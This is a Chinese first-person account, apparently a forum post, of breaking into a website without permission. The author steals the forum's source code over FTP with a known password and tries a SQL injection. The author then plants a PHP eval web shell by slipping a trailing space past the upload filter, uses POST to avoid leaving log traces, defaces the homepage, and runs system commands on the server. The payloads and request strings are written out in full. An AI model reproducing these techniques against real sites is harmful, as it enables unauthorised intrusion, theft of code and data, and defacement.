漏洞在文件上传的功能
本来没打算要黑的,但是因为他们开了FTP服务器,而其中一个用户的密码我又刚好知
道,所以就把他们主页上论坛的代码偷出来看了一下,mySQL的处理不很严密,$id之类
的变量都没有加引号,普通的字符串加了引号但是没有用mysql_escape_string处理,
我一开始就朝这个方向努力。有一个地方是这样写的:
$result=mysql_query("select * from article where flag= and id="
.$father,$db);
我在一片id是347贴子里面写了个PHP,然后我post了这么一个father:
347 into outfile f:/htdocs/cmd.php
这样就能把贴子的内容写到php里面。注意,我熟悉他们的文件系统,web文件在
"f:\htdocs"下面我事先是知道的。
但是没有成功,我开始以为是mysql把文件的权限去掉了,过了一会儿才想起来一定是
他们的php.ini里面设置了
magic_quotes_gpc=On
这样引号到了php脚本里面就自动加上了反斜杠,这么基本的概念我忘了,惭愧惭愧
于是我认为他们的论坛是无懈可击的,但是后来我注意到论坛上的一个上传的功能。我
试了一下,禁止了.php的上传,我觉得没有漏洞,但是出于好奇,我把它处理上传的
php拿下来看了一下,最关键的代码是这样的:
else if (file_exists("upload/".$file_name))
$upload_error="已经存在一个叫$file_name 的文件。";
else if (strtolower(substr($file_name,-4))==".php")
$upload_error="不能上传.php 文件。";
else if (preg_match("///i",$file_name)) $upload_error="你在干什么?";
else if (!copy($file,"upload/".$file_name)) $upload_error="原因不明。";
看起来判断很严密,因为在windows文件系统里面,最后一个字符是不能为空格的(相
应的材料可以在linux处理vfat的那个模块里面查到)。但是作者没有用
is_upload_file来判断,这个漏洞很久远了,我试了下面的命令:
upload.php?file_name=a.txt&file=c:/autoexec.bat
autoexec.bat就可以用浏览器看见了。我觉得不知足,上传了一个instruction.txt的
文件,文件内容如下:
1 error_reporting (E_ALL ^ E_NOTICE); eval(StripSlashes($cmd));
这个文件可以用来执行任何的php命令。我用了这样一个命令:
upload.php?file_name=cmd.php%20&file="f:/htdocs/weed/upload/instruction.txt
作者提示了上传以后文件的位置,所以我很容易知道我传上去的instruction.txt的绝
对路径。注意这里我在cmd.php后面加了一个空格,骗过了作者的php脚本,copy函数
忠实的为我服务了。
这样cmd.php就已经在服务器上了。为了用POST从而不在他们服务器的log里面留下痕
迹,我又在本地写了这样一个html(事实上上面的upload.php的攻击也应该用POST):
1<form action="http://xxx/weed/upload/cmd.php" method="post">
2<input name="cmd" style="{width:400}" type="input"/>
3<input type="submit" value="go"/>
4</form>
然后就是直接发命令了,我先上传了一个我自己的首页,然后依次在我自己的html的文
本框里面输入以下内容再post上去:
rename("f:/htdocs/index.php", "f:/htdocs/index.old.php");
rename("f:/htdocs/weed/upload/mypage.html", "f:/htdocs/index.html");
好了,首页已经被改掉了。然后就是很老套了,服务器上有了后门,操作就容易了:
system("dir c:\");
这个列出了服务器上c:\下面的文件
system("type f:\\htdocs\\weed\\forum.php");
这个列出了论坛的一个PHP的源码。
忠告:做大站点很难保证代码没有一点问题,但是要注意的是,即使是很小的一个漏
洞,也可能可以毁了整个站点。